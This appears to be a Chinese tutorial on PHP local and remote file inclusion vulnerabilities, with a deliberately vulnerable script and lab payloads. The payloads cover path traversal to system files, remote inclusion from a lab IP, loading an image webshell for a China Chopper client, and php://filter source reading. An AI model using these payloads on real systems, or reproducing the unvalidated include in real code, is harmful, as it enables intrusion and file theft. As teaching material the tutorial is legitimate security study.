? 程序开发人员通常会把可重复使用函数或语句写到单个文件中,形成“封装”。在使用某个功能的时候,直接调用此文件,无需再次编写,提高代码重用性,减少代码量。这种调用文件的过程通常称为包含。
? 程序开发人员都希望代码更加灵活,所以会把被包含的文件的路径设置为变量,来进行动态调用(包含),但正是由于这种灵活性,如果被包含文件的路径客户端可控,造成任意文件包含漏洞。
? 几乎所有的脚本都会提供文件包含的功能,文件包含漏洞在PHP 的Web 应用中居多,在JSP/ASP/ASP.NET 程序中比较少。
PHP 提供了四个文件包含的语句,四个语句之间略有不同。
| 语句 | 区别 |
|---|---|
| include() | 多次包含,多次执行; 如果包含失败,脚本产生警告,继续运行。 |
| include_once() | 多次包含,一次执行; 如果包含失败,脚本产生警告,继续运行。 |
| require() | 多次包含,多次执行; 如果包含失败,脚本产生错误,结束执行。 |
| require_once() | 多次包含,一次执行; 如果包含失败,脚本产生错误,结束执行。 |
? 文件包含是PHP 的基本功能之一,有本地文件包含与远程文件包含之分。简单来说,本地文件包含就是可以读取和打开本地文件,远程文件包含就是可以远程(方式)加载文件。可以通过php.ini 中的选项进行配置。
allow_url_fopen = On/Off # 通过远程方式打开文件
allow_url_include = On/Off # 通过远程方式包含文件
// file-include.php
$fp = @$_GET['filepath'];
@include $fp;
本地文件包含(Local File Include,LFI)通过本地路径访问到的文件。
?filepath=../phpinfo.php
远程文件包含(Remote File Include,RFI),通过远程路径访问到的文件。
?filepath=http://10.9.64.180/phpinfo.jpg
PHP 文件包含是程序设计的基础功能之一,能够减少代码量,提高开发效率。但是使用文件包含功能时,有类似于以上测试代码的设计,实现了动态包含,就有产生文件包含漏洞的风险。如果实现动态包含的参数,Web 应用没有进行严格的校验,浏览器客户端用户可以影响控制被包含文件的路径,就会产生任意文件包含漏洞。
无视文件扩展名读取文件内容。
?filepath=./a.jpg
无条件解析PHP 代码,为图片木马提供了出路。
?filepath=a_yjh_info.jpg
菜刀直接链接。
http://10.4.7.130/file-include/file-include.php?filepath=a_yjh_info.jpg
利用文件包含漏洞,也可以读取敏感文件。前提条件:
具体方法:
# 相对路径
?filepath=../../../../../../windows/system32/drivers/etc/hosts
# 绝对路径
?filepath=c:/windows/system32/drivers/etc/hosts
# 使用php 封装协议
?filepath=file://c:/windows/system32/drivers/etc/hosts
| 封装协议 | 说明 |
|---|---|
| file:// | 访问本地文件系统 |
| http:// | 访问 HTTP(s) 网址 |
| ftp:// | 访问 FTP(s) URLs |
| php:// | 访问各个输入/输出流(I/O streams) |
| zlib:// | 压缩流 |
| data:// | 数据(RFC 2397) |
| glob:// | 查找匹配的文件路径模式 |
| phar:// | PHP 归档 |
| ssh2:// | Secure Shell 2 |
| rar:// | RAR |
| ogg:// | 音频流 |
| expect:// | 处理交互式的流 |
利用php://fileter 读取。
?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]
读取结果:
PD9waHANCi8vIGZpbGUtaW5jbHVkZS5waHANCg0KJGZwID0gQCRfR0VUWydmaWxlcGF0aCddOw0KQGluY2x1ZGUgJGZwOw==
利用php:
//input 执行PHP 命令;
远程文件包含开启。